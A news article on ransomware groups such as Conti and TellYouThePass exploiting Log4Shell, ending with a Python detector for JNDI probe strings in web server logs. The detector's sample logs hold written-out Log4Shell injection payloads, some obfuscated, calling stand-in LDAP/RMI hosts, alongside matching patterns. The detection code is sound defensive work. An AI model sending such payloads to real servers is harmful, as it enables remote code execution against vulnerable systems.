Log4Shell on ransomware gangs’ radar, exploit attempts detected in China, the US, Europe

22 Dec, 2021

Ransomware operators have intensified attempts to exploit Log4Shell (CVE-2021-44228), a critical vulnerability disclosed early this month in Apache Log4j, a widely used open-source Java logging library. An old ransomware family called TellYouThePass, which had been inactive until a few days ago, has been revived to exploit this vulnerability, researchers at cybersecurity firm Sophos and several others said, VentureBeat reported.

Exploitation of Log4Shell by this ransomware family was first reported by the Chinese cybersecurity group Knownsec 404 Team. Researchers at Sophos told VentureBeat that TellYouThePass has targeted systems in China, along with a few in the US and Europe that were hosted on AWS and Google Cloud.

TellYouThePass isn't the only ransomware group that has sprung into action to take advantage of the opportunity. The far more notorious Conti ransomware group, which has Russian links, has also attempted to exploit Log4Shell. Researchers at New York-based cybersecurity firm AdvIntel said Conti has tried to exploit the vulnerability to reach multiple targets, including VMware vCenter, a server management product. The security firm said that Conti used Cobalt Strike against companies in the US and Europe. Cobalt Strike is a commercial adversary-simulation tool built for penetration testing by ethical hackers; its remote-access capabilities are also widely abused by criminal groups in targeted attacks.


The fact that the vulnerability is now on the radar of dangerous ransomware groups is a serious concern. Conti in particular is known to pair an initial access vector such as this one with follow-on intrusion of corporate networks.

According to AdvIntel, Conti is a very successful group and has raked in $150 million through its operations in the last six months.  

Check Point said in its report that 46% of the initial exploitation attempts were made by known malicious actors. Microsoft also warned that the majority of attacks were mass scanning to identify vulnerable websites and applications. Many of the attackers were found to be affiliated with ransomware actors and nation-state-backed threat groups, which suggests that the motive behind much of this initial activity was to gain a foothold in vulnerable applications and sell that access to the highest bidder afterwards. This could trigger a wave of ransomware attacks in 2022.


Log4j is embedded in a vast number of Java-based products and web services. Although the Apache Software Foundation has already released several patches to fix it, security experts at Check Point warned that, because patching is complex and the vulnerability is easy to exploit, it will continue to afflict organisations for years.

Within 72 hours of the vulnerability's disclosure, Check Point had detected over 800,000 exploitation attempts. It also found that 41% of corporate networks in India had been targeted. Log4Shell carries the highest possible CVSS severity score of 10.0.
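The mass scanning that Microsoft describes and the exploitation attempts Check Point counted are visible in ordinary web server logs as JNDI lookup strings (`${jndi:ldap://...}`) planted in request headers or parameters, often wrapped in Log4j's own nested-lookup syntax to evade naive pattern matching. The following detector is an added example written for this article, not code from Check Point, Microsoft, Sophos or any vendor named above. It normalises the common obfuscations (URL encoding, `${lower:...}`/`${upper:...}` and `${...:-x}` default-value tricks) before matching, and runs over a handful of constructed log lines; the IP addresses and callback hosts in them are documentation ranges, not real scanners.

```python
"""Spot Log4Shell (CVE-2021-44228) probe strings in web server logs.

Added example for this article. The sample log lines below are constructed
for illustration and do not come from any real deployment.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample lines in a Combined Log Format-like shape.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/x} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 12 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.8/o}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.13 - - [10/Dec/2021:12:00:05 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# ${lower:X} / ${upper:X}: Log4j case-conversion lookups used to split up "jndi".
LOWER_UPPER = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-X}: an undefined lookup falls back to its default value X,
# so ${::-j} or ${env:NOPE:-j} both evaluate to the single letter "j".
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The resolved lookup we are actually after: scheme and callback host.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//?([^/\s}]+)", re.IGNORECASE)


def normalize(payload: str) -> str:
    """Peel back URL encoding and nested Log4j lookups until nothing changes.

    Innermost lookups contain no braces, so each pass resolves one layer;
    the loop bound guards against pathological input.
    """
    prev, cur = None, payload
    for _ in range(10):
        if cur == prev:
            break
        prev = cur
        cur = unquote(cur)
        cur = LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            cur,
        )
        cur = DEFAULT_VALUE.sub(lambda m: m.group(1), cur)
    return cur


def detect(line: str) -> Optional[Dict[str, str]]:
    """Return scheme, callback host and the de-obfuscated lookup, or None."""
    match = JNDI.search(normalize(line))
    if not match:
        return None
    return {
        "scheme": match.group(1).lower(),
        "callback": match.group(2),
        "normalized": match.group(0),
    }


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over log lines, tagging each hit with the source IP."""
    hits = []
    for line in lines:
        hit = detect(line)
        if hit is not None:
            hit["src"] = line.split(" ", 1)[0]
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS):
        print(f"{h['src']:<14} {h['scheme']:<5} -> {h['callback']}  ({h['normalized']})")
```

The callback host is the most useful field for triage: it is the attacker's LDAP/RMI server, and a single scanning campaign tends to reuse it across many targets, so grouping hits by callback separates mass scanning from a targeted attempt. The normaliser handles the obfuscations seen most often in scanning traffic, but Log4j's lookup language allows other constructions, so treat a miss as absence of evidence rather than proof of a clean host, and confirm with the vendor patches rather than log filtering alone.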